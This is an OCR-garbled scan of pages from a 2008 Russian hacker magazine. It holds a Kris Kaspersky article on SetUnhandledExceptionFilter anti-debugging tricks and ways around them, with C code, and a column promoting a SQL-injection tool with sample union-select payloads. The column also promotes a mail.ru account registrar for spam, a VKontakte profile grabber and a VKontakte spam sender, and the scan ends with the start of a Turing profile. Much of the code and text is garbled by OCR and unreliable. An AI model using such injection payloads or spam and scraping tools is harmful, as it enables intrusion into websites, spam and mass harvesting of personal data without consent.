• В последующих версиях планируется добавить автоматический поиск Интер- 
нет-шлюза. 
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КЛИКНИ НА ГАЗ! 



оп-Ііпе гонки на ѵѵѵѵѵѵ.тахі-гасіпд.ги 





Многочисленные призы 
от АІріпе 



Махі Васіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Касіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Месііа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХІ КАСІІЧС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и ѵѵѵѵѵѵ.тахі-1:ипіпд.ги 



РОСНО 



в составе АНіапг (Ш) 



Ягыпіпд 



тзп 







взлом 



КРИС КАСПЕРСКИ 



энциклопедия аа 

АНТИОТЛАДОЧНЫХ 

ПРИЁМОІЙНШ 



ІОтладчики, работающие через М5 РеЬи 



ынуждены мириться с тем, что отладочные процессы «страдают» хрони 



ескими особенностями поведения. Они «ломают» логик 



аммы, и это 



|с огромной выгодой используют защитные механизмы. В частности, АРІ 






'ется — вовсе не баг отладчика, а документированная фича системы! 



Н РІЖ0АМЕЫТАІ.5 

Рассматривая обработку структурных исключений в предыдущем 
выпуске, мы мельком упомянули, что всякий процесс от рождения по- 
лучает первичный обработчик структурных исключений, назначаемый 
операционной системой поумолчанию. Если программист забыл (или 
не захотел) назначать свои собственные обработчики, то все исклю- 
чения, возникающие в ходе выполнения программы, попадают в пасть 
первичного обработчика. Он расположен в ШВЬЬ.ВЬЬ и, в зависи- 
мости от настроек оси, либо вызывает «Доктора Ватсона», либо вы- 
водит знаменитый диалого критической ошибке с вариантами: «О К» 

— завершить приложение в аварийном режиме и «Сапсеі» — вызывать 
бивЫп-Тіте отладчик (в роли которого может выступать и Ольга). 

То же самое происходит, если программ ист уста на вливает один или 
несколько обработчиков структурных исключений, но никто из них не в 
состоянии справиться с ситуацией — вот они и передают исключение 
друг другу, покаононе докатится до системного обработчика. Систем- 



ный обработчик легко подменить своим (было бы желание). Достаточно 
вместо ссылки на предыдущий ЕХСЕРТІО^КЕвіЗТЕАТІОЫ затолкать 
в поле ргеѵзначение «-1 ». Это будет свидетельствовать, что данный 
обработчик — последний в цепочке. 

Как вариант, можно воспользоваться АРІ-функцией ЗеШпЪапсИе 
с іЕхсерѣіопРіІіег () , перекрывающей обработчик исключений 
верхнего уровня (іюр-іеѵеі ехсерііоп ЬапсІІег). Да, именно «верхнего», 
поскольку ѴѴІп б оѵѵв создавалась в Америке, расположенной на проти- 
воположной стороне Земли, где люди ходят вверх ногами. Первичный 
системный обработчик, с ихточки зрения, находится на вершине 
пирамиды структурных исключений, в то время как русские програм- 
мисты склоны рассматривать его как «основание». Но это все лирика, а 
дело-то в том, что... 

Функция ЗеѣІІпІіапсіІесіЕхсерѣ іопР і Іѣег () , перекрывая 
системный обработчик, в неволе работать отказывается, то есть 
получает управление только, когда процесс не находится под от- 
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ІЗапусктестовой программы под «чистой» Ольгой 
Я(без специальных ріид-іп'ов) приводит к детек- 
ціи отладчика 



иж - іч 




Отладчики 5оЙ-Ісе и Эузегтакже «палятся», если 
>ычажок«ІЗНЕРЕ»установлен в положение «0І\І» 



ладчиком. В противном случае исключение передает- 
ся непосредственно самому отладчику. Это — задумка 
проектировщиков, кстати сказать, довольно ориги- 
нальная и полезная. Если отладчика нет — установ- 
ленный программистом обработчик берет управление 
на себя и завершает работу программы максимально 
корректным образом. Если же процесс находится под 
отладкой, операционная система передает браз- 
ды правления отладчику, позволяя разобраться с 
ситуацией, поскол ьку после за вершен ия программы 
разбираться будет не с чем и некому. 

Атеперь, внимание, вопрос! Что произойдет, если в 
обработчик, установленный ЗеѣІІпЬапіЗІесЗЕхсерѣі 
опРіІѣег () , воткнуть не код аварийного заверше- 
ния приложения, а кусок функционала, например, 
расшифровщик какой или просто пару строк на Си, 
меняющих значение флага ип<Зег_<ЗеЪиидег? Пра- 
вильно — мы получим великолепный способ детекта 
отладчиков прикладного уровня ! 

В ЭКСПЕРИМЕНТ — РКО-М-СОНТВА 
5 ЕТУЫНАЫ 0 І.Е 0 ЕХСЕРТІ 0 НРІІТЕН 

Напишем простейшую тестовую программу, позволяющую 
исследовать реакцию отладчиков на фильтр, установлен- 
ный функцией Зеѣ17п]пап<31е<ЗЕхсерѣіопРі Іѣег ( ) . 
Насгасктеонаникакнетянет(слишкомпрозрачнаи 
элементарна), носгасктемы написать завсегда успеем ! 
Сейчас главное врубиться в тему и выяснить — насколько 
надежен этот трюк, можно ли его обойти и если да, то как? 
Один из примеров реал изаци и тестового стенда приведен 
ниже. 

Исходный текст программы БеШпИапсНесіЕхсерІіопРіиег, 
демонстрирующей технику использования функции для 
борьбы с отладчиками 

#іпс1исіе сміпсіомз . Ь> 

сЬаг сОэдпоо [ ] = "сІеЬиддег із поД ЬеЦесЦесГ' ; 

сЬаг с!Ьдуез[]= "СІеЬиддег із ЬеДесЕесі :-) " ? 

// ме ехресД сІеЬиддег Ьу ЬеіаиШ 
сЬаг *р = сіЬдуез; 



ЬСЖС зоигіг ( 

_ЕХСЕРТІОЫ_РОШТЕК5 *ЕхсерДіопІпіо ) 

{ 

// іі ѵ/е'ге Ьеге, ргосезз із _поі_ ипЬег 
ЬеЬиддег 
р = сПэдпоо; 

// зкір ШТ 03 (ССЬ) сошшапсі 
ЕхсерііопІпіо->СопіехіКесогс1->Еір++ ; 

/ / ѵіе ѵсгапі іЬе ргодгаш До сопііпие ехесиііоп 
геіигп ЕХСЕРТІОЫ_СОЫТІШЕ_ЕХЕСЕТІСЖ; 

} 

пегиші ( ) 

{ 

// зирегзесіе іЬе сіеіаиіі іор-іеѵеі ехсерііоп 
Ьапсііег Ьу зоигіг () ргос 

ЗеШпЬапсіІесіЕхсерііопЕіІіег ( 

(ЬРТОР_ЬЕѴЕЕ_ЕХСЕРТІОЫ_ЕІЬТЕК) &зоигіг) ; 

азш { 

іпі 03 ; // депегаіе ап ехсерііоп 

} 



011уБЪ§ 1.x 
имеет коварный баг! 

Ольга версии 1.10 имеет неприятный баг — если непосредственно за 
ІЫТ ОЗЬ следует команда РІІЗНРЕ } заталкивающая флаги в стек, отлад- 
чик едет крышей и теряет управление над отлаживаемой программой, 
даже если мы нажимаем <Р7>/<Р8> (5іер Іпіо/Зіер Оѵег). Для де- 
монстрации бага достаточно воткнуть в листинг пару команд РИЗНРЕ/ 
РОРРЕ. А вот те же самые команды, отделенные от ЫѴТ ОЗЪ одной или 
несколькими инструкциями ЕОР (или любыми другими) работают впол- 
не нормально. 

В Ольге 2.x ошибка уже исправлена, однако, учитывая, что 2.x все еще находится в 
стадии разработки, основным инструментом хакеров остается Ольга 1.10 с багом 
на борту. 
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Запусктестовой программы под«чистой 
[нормально *• * Ч. ^ 1 



осью проходит 



|5еШпИапсІ[есІЕхсер1:іопРІ[1:ег() на М5РЫ| 



<НісІе Р еЬиддег» ріид-іп позволил спрятать отладчикот) 
іащиты^И 



I I ІІІІІ I ІІ II I | I ІІ| I III пи I 1 1 1 1 И I I и 1 1 и 1 1 1 і М МИМ II III Д 

|основанными на обработке необрабатываемых исключений] 






ОТЛАДЧИК 



ДОПОЛНИТЕЛЬНЫЕ ОПЦИИ 



ДЕТЕКТ ОТЛАДЧИКА 



в Ольгу и давим <Р9> (Рип). Ага! Ольга стопорится на ІЫТ 
ОЗЬ, что выглядит подозрительно (нормальные программы 
ШТ ОЗЪ не вызывают), хотя и не смертельно. Жмем <Р9> 
еще раз для продолжения выполнения и ловим месседж: 
«дэбагэр ис дэтэктэт». 

Начинаем соображать — как можно это отловить, обломав 
защите рога. Что ж, достаточно поставить точку останова 
на АР I -функцию ЗеѣІІпЪ_ап(31ед.Ехсерѣ іопЕ і Іѣег ( ) , 
запомнить передаваемый ей указатель на процедуру- 
обработчик (в данном случае это — зоигЫ и кидать сюда 
управление каждый раз, когда отладчик ловит исключе- 
ние, не обрабатываемое 5РН -фильтрами, установленными 
программистом (если они вообще есть). 

Итак, необходимо: отловить вызов ЗеѣІІпІіапсЗІесЗЕхсер 
ѣіопЕіІѣег () , запомнив (записав на бумажку) указатель 
на фильтр, а при возникновении исключения — раскрутить 
цепочку 5РН-фил ьтров. Рели последний фильтр в цепочке 
направлен в отладчик, мы должны вручную переместить 
ЕІР на фильтр, установленный ЗеШпЪапсІІесІЕхсерѣіо 
пЕіІѣег ( ) , передав ей в качестве аргумента указатель на 
структуру _ЕХСЕРТІ0Ы_Р0ІЫТЕК8, содержащую инфор- 
мацию об исключении. 

Чтобы не париться, эту работу можно автоматизировать 
— написать свой собственный скрипт/плагин или восполь- 
зоваться уже готовым. Например: «Нібе РеЬиддег» ріид-іп 
Ьу Азіегіх, который можно бесплатно скачать с ОрепРСЕ 
(или другого сайта хакерской направленности): орепгсе. 
огд/Ьоѵѵп[оаб5/сІеІаі[5/238/НісІе РеЬиддег . 

Кстати сказать, НісІе_РеЬиддег изначально входит в состав 
УРЬд, представляющий собой популярный мод Ольги 
и, естественно, бесплатный: Іеат-х.ги/диги-ехе/ТооІз/ 
РеЬиддег5/ОЦѵРЬд/ОЦуРЬд%20ѵ1.Ю%20УРЬд%20Ве1а.72 . 
Заходим в меню«РІид-іпз», находим там «Нісіе 
ЬеЬиддег». В опциях взводим галочку «ЫпЬапсІесІ 



взлом 



Запустив файл на выполнение, мы получим сообщение, что 
отладчик не обнаружен. А как насчет работы под отладчи- 
ком?! Загружаем ЗеѣІІпЪапсіІесІЕхсерѣіопЕіІѣег . ехе 



Сводная таблица детекта отладчиков 



// ЕегтіпаЕе Ыге ргодгат, вііотпд Оке гезиІС 
ЕхіЕРгосезз (МеззадеВох ( 0 , р , р , 0 ) ) ; 



Собираем программу компилятором М5 Ѵізиаі С++ со сле- 
дующими ключами (см. ниже) и получаем файл размером 
всего в 832 байта (и это еще не предел, — если выкинуть 
заглушку М5-Р05, программа похудеет еще на пол сотни 
байт). 



СБОРКА ПРОГРАММЫ БЕТІІИНАМОІ-ЕОЕХСЕРТІОМРІІ-ТЕВ 
.С В КОМАНДНОЙ СТРОКЕ СРЕДЫ МІСВ050РТѴІ51ІАІ- С++ 

ЗЕТ ЖК=8еШпЪапс11е(іЕхсер0іопЕіІ0ег 
сі.ехе /с /Ох %ШК% . с 

Ііпк.ехе %ШК% . оЬ^ /ЕІХЕБ /ЕЫТКУ : пезиші 
/ЗІІВЗУЗТЕМіСОЫЗОЬЕ /АЫСЖ16 
/МЕКСЕ: .(ІаЕа=.ОехО 

/МЕКСЕ : . гсіаОа= . ЕехЕ КЕКЫЕЕ32 . ЫВ 113ЕК32 . ЫВ 



Щ ЁЫ ГІ -I ** р= ■!■!»= Г гМЧ- 



Ыш і'І ні^: ■ І-] ^ Ни чіііи іи I щ\ц\ 







УЕ5 


Онуйве 


НШЕ ОеВШОЕК РШ6-Ш ву Азтешх 


УЕ5 






УЕ5 


ША-Рко 




УЕ5 


М5ѴС 




N0! 


ЗОРТ-ІСЕ 


ІЗНЕРЕОЫ 


УЕ5 






N0! 


5узек 


ІЗНЕРЕОЫ 


УЕ5 



г-Е-і 



► 068 



ХАКЕР 07 /115/ 08 






» 



взлом 



АТЫ ЗНАЕШЬ, 
ЧТО... 

«Нісіе ВеЪи§§ег» 
р1и§-іп можно 
задетектить! 

Плагин «Нісіе ОеЪи^ег» от Азіегіх’а (как и большинство других ріаіп- 
іп’ов подобного типа) достаточно легко задетектить, и тогда защита 
вновь обломает отладчик. В процессе работы «Ыйе беЪи§§ег» изменяет 
адрес функции ШОиегуІпЕогтаЫопРгосезз () в таблице импорта 
библиотеки КЕШЕЬ32 . ЕЬЬ. Он записывает сюда команду перехода 
на свой собственный обработчик, расположенный в одном из блоков 
динамической памяти отлаживаемого процесса, который легко нахо- 
дится сканированием кучи и прямым поиском р1и§-іп’а по сигнатурам. 
В этом случае функция сЬеск_Еог_азѣ егіх_Ы <Зе_<ЗеЬиддег_ 
ріидіп () возвратит значение А8ТЕК1Х_НШЕ_ОЕВ1ЮСЕВ.. 
Естественно, после того, как АзЩгіх перепишет свой р1и§-іп, сигнатуры 
уйдут лесом и данный метод детекции перестанет работать. Однако, 
нетрудно реализовать универсальный детектор, основанный на самом 
факте подмены адреса ШОиегуІпкогшаѣіопРгосезз () .Достаточ- 
но распарсить таблицу импорта КЕШЕЬ32 . БЬЬ и, если адресной 
егуІпЕогша к і опРгосезз () выходит за пределы модуля ШТРЬЬ . 

ЕЬЬ (откуда эта функция, собственного говоря, и импортируется), то, 
значит, мы имеем дело с «нестерильной» системой (строго говоря, это 
может быть и не только НШЕ_ВЕВисСЕК ) но и какой-нибудь гоогкіг, 

— разработчиков защит подобные мелочи не волнуют) . 

Код детекции «Нісіе сіеЬиддег» ріид-іп’а 

// ѵегу сіігку апкі-апкі-сІеЪид кгіск 
скеск_ког_азкегіх_кіс1е_(іеЪиддег_р1идіп ( ) 

{ 

іпк а; іпк гек;іпк р=0; ВУТЕ *х; 

МЕМОКУ_ВА5 1 С_І БЕОКМАТ I (Ж шешіпко; 

// азкегіх'з ЬісіесІеЪиддег ріидіп скапдез асМг о к 



ЫкОиегуІпкогтакіопРгосезз 

// іп кке КЕКМЕБ32 . ВЕБ ІАТ ко Мз оѵт капЫег 
ріасесі іп кке кеар гме Ыоск зо, ко сіекеск кке ріид- 
іп, ѵ^е каѵе ко кіпсі кке _сегкаіп_ кеар-Ыоск апсі 
скеск зідпакиге оик . ік'11 члгогк ипкіі азкегіх Ьоезп'к 
гешгіке кке сосіе. 
ѵккііе (1) 

{ 

ік ( ! ѴігкиаіОиегу ( (ѵоіа* ) р, &тетіпко, 
зігеок (шешіпко) ) ) Ьгеак; 
ік ( (шешіпко. КедіопЗІ 2 е== 0 х 1000 ) && 

(шешіпко . Туре==МЕМ_РКІѴАТЕ) && 

(шешіпко . 8каке==МЕМ_СОММІТ) && 

(шешіпко. Ргокеск = = РСЕ_ЕХЕСІІТЕ_КЕАБШКІТЕ) && 

( * ( (ипзідпесі іпк* ) р) = = 0х04247С83 ) ) 
гекигп АЗТЕКІХ_НІВЕ_ВЕВБССЕК; 
р += шешіпко . КедіопЗіге; 

} 

// І'т коо іагу ко рагзе ІАТ ок кке КЕКМЕЕЗ 2 . ВЕБ , 
зо I :)изк скеск оик кке асМгезз ок кке БкОиегуІпкогш 
акіопРгосезз , коипсі іп СекБодісаіБгіѵез ок соигзе, I 
каѵе по диагапкее кке сосіе ок СекБодісаіБгіѵез мііі 
Ье ипскапдесі іп кке пехк ѵегзіопз ок Ѵііпскжз . I кпом 
ко рагзе ІАТ , Ьик ... I сіоп' к мапк ко . I коісі уои , І'ш 
коо Іаггу. 

х= (ВУТЕ*) СекРгосАскігезз (СекМосіиІеНапсіІе ( 

" КЕКШСЕЗ 2 . БББ " ) , "СекБодісаіБгіѵез" ) ? 
ког (а = 0; а < 0x69; а+ + ) 

{ 

ік ( ( * ( (ВШБ*)х) ==0х15ЕЕРРбА ) && 

( * ( (ЖЖБ*) (х+8) ) = = 0х0С085) && 

( * ( ВТАЮКВ* ) ( * (ВЖЖВ* ) (х+4 ) ) < (БШЕБ) 
СекМосіиІеНапсіІе ( "БТБББ.БББ" ) ) ) 
гекигп МеззадеВох ( 0 ,петлц кісі, 0 ) ; гекигп 
ШКШШ_НІВЕ_ВЕВШСЕК ; 
х++ ; 

} 

// ік ѵ^е'ге кеге, тл/еіі. . . кі сіе -сіеЬиддег ріид-іп із 
пок сіекескесі :— ) 

гекигп Ш_НІВЕ_ВЕВШСЕК; 

} 



ехсерііоп ігіскз», затем нажимам <СТЕІ_-0>. В открывавшемся диалоговом 
окне выбираем вкладку «Ехсербопз» и взводим галочку «I N1 03 Ьгеакз» 
для передачи ломаемой программе исключений, генерируемых ШТ ОЗЬ. 

В конфигурации поумолчанию Ольга, как и большинство других отлад- 
чиков прикладного уровня, молчаливо поглощает ШТ ОЗЬ — и потому 
никакой обработчик исключений вообще не вызывается. На самом деле, 
ШТ ОЗЬ не имеет отношения кЗеІІІпЬапсІІесІЕхсерІіопЕіІѣеги, если 
бы, мы, например, генерировали исключения путем обращения к нулевому 
указателю, последнего действия не потребовалось. Достаточно было 
бы просто взвести «I N1 03 Ьгеакз» (подробнее о передаче исключений 
программе мы поговорим в следующем выпуске, а пока вернемся к нашим 
баранам). 

Перезапускаем отладчик, чтобы изменения вступили в силу и «пытаем» нашу 
тестовую программу еще раз. На экране победно отображается «сіеЬиддег із 
поісіеіесіесі». Открываем пиво на радостях! Мы нашли способ, как обломать 
этотантиотладочный прием (между прочим, весьма популярный). 



Что же касается отладчиков типа 5оЫСЕ и Зузег, то они никакие воздейст- 
вуют на поведение функции ЗеѣІІпЬапЗІесЗЕхсерѣіопЕіІѣег () , 
поскольку отладочного процесса не порождают и ведут себя, будто их здесь 
вообще нет. 

Но если, терзая нашу программу, сказать отладчику «ІЗНЕКЕ 01М» и заста- 
вить его всплывать на программныхточках останова (у многиххакеров эта 
команда пробита в строке инициализации), то отладчик «зажует» исключе- 
ние, генерируемое инструкцией ШТ ОЗЬ. Потому до ломаемой программы 
оно вообще не дойдет, а, значит, установленный фильтр не будет вызван. 

На экране снова появится улыбающаяся рожа, подтверждающая детект 
отладчика. 

Таким образом, трюке 8еШпЪ.апс11есІЕхсерѣіопЕі1іег () реально ра- 
ботаеттолько с ЮА Рго, М5ѴС идругими примитивными отладчиками. Для 
всех остальных он не представляет никакой угрозы, если, конечно, заранее 
знать, что это такое и с чем его едят, ибо в конфигурации поумолчанию Ольга 
детектится только так. цс 



ХАКЕР 07 /115/ 08 



► 069 



^ взлом 




ПРОГРАММА: ЗОЫШ 
ОС:У№0У5200О/ХР 
АВТОР: 0ЕІ_ѴІ8Н ТНЕ 0АМ1ЧЕ0 




Реализуем зці-іщесбоп 



В прошлых выпусках][я выкладывал несколько 
наиболее удачных релизов брутеров/сканеров для 
реализаций 501-инъекций. Настало время пора- 
довать тебя очередным полезным и незаменимым 
инструментом — утил ой 5СІІ_-Ігф Тулза предназначе- 
на для реализации скул-инъектов и функционирует 
в полуавтоматическом режиме. При первой встрече 
с прогой может появиться немало вопросов, поэтому 
вкратце ознакомлютебя с рецептом применения 
сего зверя. 

1 . В пол е «адрес» вводим адрес са йта с бажн ы м 
скриптом и параметром(-ами). При мер урла уже забит 
в адресной строке. 

2. Далее выбираем пункт«Сгоир Ъу»или«Огс1ег 
Ьу» и жмем на батон запуска. Количество полей 
рекомендуется сначала оставлять дефолтным (вряд 
ли полей может быть 99 и более, — страница покажет 
ошибку и на основании этого можно понять, проходит 
запрос или сразу фильтруется скриптом). 

3. Уменьшаем количество полей на разумное (1 0-30) 
и повторяем проверку. И такдалее, до выяснения 
точного их количества. 

4. Выбираем пункт «шіоп ЗеІесН» — количество 
полей будет поставлено автоматически на основании 
счетчика. Делаем проверку. Если действия удались и 
незафильтровались— тебе повезло. 

5. Кнопки «Ѵегзіоп ( ) », «ІІзег ( ) » и 
«БаНаЬазе ( ) » вставят в строку за проса соответс- 
твующие команды по курсору. Необходимо поставить 




ЛЕОНИД «ВОЮ» СТРОЙКОВІ 

I пою@вкТц/Н 




Программы для хакеров 




курсор в нужное место строки запроса (например, 
на место цифры 4, а ее самуудалить) и нажать на 
соответствующий батон. Если не поставить курсор, то 
команды добавятся в начало строки. 

6. Кнопки «Ргот», «ѴЛгеге», «ТаЫе_Ыаше», 

« ІпіогтаН іоп_5с1іета» вста вят соответству- 
ющийзапросвсамый конец строки, если небыло 
постфикса (например, «/*») — илиже непосредс- 
твенно перед постфиксом. При выборезначений из 
раскрывающегося меню команда будет вставлена 
также, как это дел а ют предыдущее кнопки (вконец 
или перед постфиксом). Команда из списка колонок 
вставится по курсору (также, каки для кнопок 
«ІІзег ( ) », «Ѵегзіоп ( ) «.«БаОаЬазе ( ) »). 

7. Присутствует возможность выбора разделителя 
команд — «+»,«/**/» и « » (пробел). Также перед 
запуском запроса на исполнение его можно просмот- 
реть, нажав на клавишу«Предпросмотр». 

8. Списоктаблиц и колонок можно отредактировать 
са м остоятел ьн о . Д ел а ется это , ка кты уже до гадал ся , 
ручками. Таблицы находятся в файле ТаЫез . ОхС.а 
колонки — в СоТптпз . ДхО. 

9 . Д о п . парам етр — это есл и стро ка б ы л а в и да « з і О е . 
сот/ іпсіех. рЪр?іс1= 12 &раде=пемз» и уязви- 
мость найдена в параметре Ю. Тогда конецстроки 
«&раде=пе\ѵз» нужно записать в до п. параметр. 
Пример находится в самой программе. 

1 0. Имеется возможность указать, что будет вставле- 
но в качестве параметров строки: 

a) цифры (. . . ?і<і=12+Шіоп+зе1есЕ+1,2 ,3 ,4/*); 

b) слово (если на странице ничего не отоб- 
ражается, а в коде страницы искать нужные 
цифры утомительно, то выбираем этот пункт). В 
зависимости от количества столбцов появится 
количество слов 'Віа' с порядковым номером 

( . . . ?іс!=12+ипіоп+зе1ес0+ ' Ыаі ' , ' Ыа2 
' , 'ЫаЗ * /*). Таким образом, в коде становит- 
ся проще находить выводимые поля; 

c) команда пиіі — для любителей неизвестности :). 
Р.З. Отдельное «спасибо» говорим авторутулзы 
(ОеІѵізЬ Ібе ОатпесІ). Он предоставил свое детище на 
общее пользование. 



ПРОГРАММА: МАІІ_.КІ_І КЕССЕР 
ОС: ^ІЧІХ/ѴІІЧ 

АВТОР: 0Х 




Так рега ют аккаунты на плаіі.ги 



Наиболее качественным способом спама в 
последнее время считается рассылка с ис- 
пользованием за рега иных почтовых аккаунтов. 
Неудивительно, что актуален софт, позволяю- 
щий регать аккаунты на различных ппаіі-сер- 
висах. Примером является «маіі.ги Кеддег» 

— полуавтоматический регистратор аккаунтов на 
таіі.ги, написанный на РНР. Скриптзаполняет 
все необходимые данные рандомно, оттебя 
требуется только ввести капчу. Утила использует 
технологию АЗАХ, поэтому регистрация проходит 
максимально быстро. 

Характеристикитулзы: 



1. АЦАХ + РНР 

2 . Минимум настроек, скрипт все за- 
полнит сам рандомно 

3 . Есть поддержка прокси 
4 . Поддерживает два вида капч на 
таіі . ги 



Учти, что понадобится хост с поддержкой РНР, 
ізоскореп и сессий (бесплатные хосты с рекла- 
мой не подойдут). 
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Р.5. Автор и редакция никакие призываюттебя кспа- 
му или иным противозаконным действиям (особенно, 
поотношениюкМаіІ.пфЗа все свои поступки ты 
отвечаешь сам. Помни, что спам — это плохо. 

ПРОГРАММА: ѴОІІКІСО БОТ 
ОС^ІЧІХ/УІІЧ 
АВТОР: ІЧОМЕР1 




Поднимаем ІСО-бота 



Помнится, нетакдавно на нашем ОѴОты моглицез- 
реть удобного ІСО-бота. Пришла очередь показать 
тебе достойный аналог — «УоигІСО ВОТ». Тулза 
представляет собой ІСО-бот, написанный на РНР, с 
админкой дляуправления функциями, изменения 
настроек и просмотра логов. Перейду непосредствен- 
но кописаниюугилы. 

Начнемсадминки: 



• Добавление , изменение и удаление 
функций (команд бота) 

• Изменение настроек бота: номер, 
пароль, метод сохранения логов, шаб 
лон для доступа к командам и т . п . 

• Просмотр и очистка логов (удачные 
команды обозначены синим цветом, 
неудачные — красным) 



Функции для админа, которые вызываются по ІСО: 



• Чтобы отключить бота, надо послать 
ему команду «збор». По дефолту — это 
сообщение «!збор», но если ты менял 
шаблон команд, то оно будет другим 

• Команда «гезбагб» нужна для пере- 
запуска бота 

• Команда «абтіп_абб» добавляет функ- 
цию к боту. Можно добавить как ста- 
тичную (то есть ту, которая не имеет 
параметров; например, «Ьеір») , так 

и динамичную (например, «бгапзіабе») 

• Команда «абтіп_бе1ебе» с парамет- 
ром, в котором указывается название 
команды, удаляет функцию 

• Команда «абшіп_збабиз» имеет 1 па- 
раметр — это статус бота , который ты 
хочешь поставить 

• Комада «абтіп_хз какие» также имеет 
1 параметр — он устанавливает ста- 
тус-картинку 



В общем, возможности бота можно охарактеризоватьтак: 



1. Все функции имеют РНР-синтаксис 
2 . Есть возможность управления ста- 
тусами, функциями по ІСО 



3 . Есть и стандартные функции : оп- 
ределить ТИЦ и РК сайта, перевести 
текст «рус епд рус», закодиро- 
вать текст по заданному алгоритму, 
раскодировать 



Чтобы бот за работал, нужно всего лишь поставить на 
файл Ъок_сопкід.рПр права назапись(0з777), 
пройти уста н о в ку п о фа й л у іпе к а 1 1 . рЪр и удал ить 
его. После любого изменения в админке необходимо 
перегрузить бот. 

Отметим, что функции абтіп_абб, абтіп_бе1еке, 
абтіп_екакиз и абшіп_хзбабиз,атакже сохра- 
нение логов могут не работать, если установлено 
ограничение времени коннектасбазой. 

Р.5. Бот реализован на классе ѴѴеЫсцРго. 

ПРОГРАММА: ѴКОЫТАКТЕ СКАВВЕК 
ОС: ^ІЧІХ/ѴІІЧ 

АВТОР: ОХ 




Грабим данные с ВКонтакте 



Втулзахя не раз выкладывал полезные софтинки на 
тему популярного ресурса ВКонтакте. Воти сейчас 
хочу обратитьтвое внимание на очередной релиз 
отхакера, скрывающегося под ником ОХ.Утила 
ѴКопІакІе бгаЬЬег— это комплекс скриптов, позво- 
ляющих собирать анкеты с ѵкопіакіе.ги и сохранять 
данные втаблицуМу50І_. 

Скрипт собираетданные из открытых анкет. 
Необходимо задать несколько десятков аккаунтов 
ВКонтакте (сотни валидных хватит за глаза). Утила 
автоматически выберет все валидные и начнет 
сбор, иногда выводя информацию в браузер. По 
пути будут отбрасываться аккаунты, имеющие 
рейтинг менее 30% (если таковые окажутся среди 
заданных). Все данные будутсохраняться втаблицу 
в БД МуБОБ. Если записьс заданным іб уже 
существует, она просто обновится. Если скрипт 
обнаружит сообщение ВКонтакте «Слишком быст- 
рый просмотр страниц», то автоматически будет 
применена задержка. 

С помощью ѵіеѵтег . рЬр можно сделать выборку из 
базы по всем доступным полям. 

Несмотря на то, что РНР не поддерживает много- 
поточность, можно открыть несколько экземпляров 
скрипта и собирать анкеты с разныхдиапазонов іб. 
Скриптумеет собирать практически любые данные из 
анкеты. Комплектуется тулза из следующих файлов: 



зекир.рЬр — инсталлятор; его необхо- 
димо запустить в первую очередь 
іпбех.рЬр — сам граббер 
ѵіеѵ/ег.рЬр — позволяет сделать 
выборку ІБ из базы по различным кри- 
териям 



ѵіеѵ/іб.рЬр — просмотр данных о чело- 
веке с указанным ІБ (вызывается из 
ѵіечлег . рПр) 



Требования для работы скрипта: 



• РНР с поддержкой кзоскореп и зек_ 
кіте_1ітік ( 0 ) ; ідпоге_изег_аЪогк 
— опционально 

• МуЗОЬ 4 . 1 и выше 

• Несколько десятков аккаунтов ВКон- 
такте с рейтингом больше 3 0% 



В общем, еще один полезный и функциональ- 
ный скрипт от БХ. Пользуйся, но незабывай про 
копирайты. 

ПРОГРАММА: ѴКОІЧТАКТЕ МЕЗЗЕИСЕР 
ОС: ^ІЧІХ/ѴІІЧ 

АВТОР: ОХ 




Рассылаем месса ги ВКонтакте 



Несмотря нато, что спам — мировое зло, предлагаю 
тебе ознакомиться с угил ой «Ѵкопіакіе Меззепдег». 
Каквидно из названия, тулза предназначена для 
спама по довол ьно известному ресурсу. 
Скриптумеет: 



• Рассылать сообщения на стены ВКон- 
такте по диапазону іб 

• Рассылать сообщения на стены дру- 
зей каждого заданного аккаунта 

• Флудить на стене конкретного че- 
ловека 

• Рассылать сообщения на собственные 
стены каждого заданного аккаунта 

• Добавлять: 

• Предложение каждому заданному 
аккаунту ; 

• Вопрос каждому заданному аккаунту; 

• Заметку каждому заданному акка- 
унту . 

• Позволяет: 

• Указать задержку отправки 

• Рандомизировать сообщение 



Имеется чекер аккаунтов. Скрипт написан на РНР 
с использованием сокетов, нетребует никаких 
дополнительных модулей и юзаеттехнологию 
А)ах (это оченьудобно). Требуется лишь подде- 
ржка сессий и кзоскореп. 

К сожалей ию, скрипт пребывает в обфусцирован- 
ном и запакованном виде. Но на функциональ- 
ности это никак не отражается. т 
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МАРИЯ «МІРНІЫ.» НЕФЕДОВА 

/ міршы.@вшоіск.кіі / 



^ сцена 



Профайл: Аіап Магішоп Тигіп§ 



Путь 

Алана Тьюринга 

Мало кому незнакомо его имя, ведь понятие «машина Тьюринга» стало 
настоящим базисом информатики и вошло во все учебники. «Тест Тью- 
ринга» активно используется для проверки возможностей ИИ, а пре- 
мией Тьюринга награждают ежегодно. Но гораздо меньше людей знают 
о том, что Алан Тьюринг (Аіап МаГИІБОП Тигіп§) был человеком очень 
нелегкой судьбы, ушел из жизни, когда ему был всего 41 год, а все- 
мирное признание получил лишь посмертно. 



Н ДЕТСТВО, КОЛЛЕДЖ И МАШИНА ТЬЮРИНГА 

Тьюринг родился 23 июня 1912 в добропорядочной семье английских 
аристократов. Согласно порядкам и традициям чопорной Англии, воспи- 
тывался маленький Алан не дома, а в суровых частных заведениях, в то 
время как его отец служил в Индии, в английском колониальном ведомс- 
тве. Гений Тьюринга начал проявлять себя уже в этом, совсем юном, воз- 
расте. Он научился самостоятельно читать к шести годам, серьезно увлек- 
ся химией ближе к десяти и вообще, его интересовали вещи, даже близко 
не лежащие рядом с классическими понятиями об образовании того вре- 
мени. Впоследствии именно из-за этого у Тьюринга возникли сложности в 
школе. Учился он в Шерборне, в графстве Дорсет на Юго-западе Англии, 
в привилегированном частном учебном заведении для мальчиков (так 
называемой «риЫіс зсНооІ»). «Благодаря» своим странным увлечениям, 
почетом у учителей он не пользовался, да и у однокашников — тоже. В то 
время все предметы из сферы его интересов, в отличие от наук гумани- 
тарных, в риЫіс зсбооі не преподавали, и по успеваемости Тьюринг счи- 
тался едва ли не худшим в классе. 

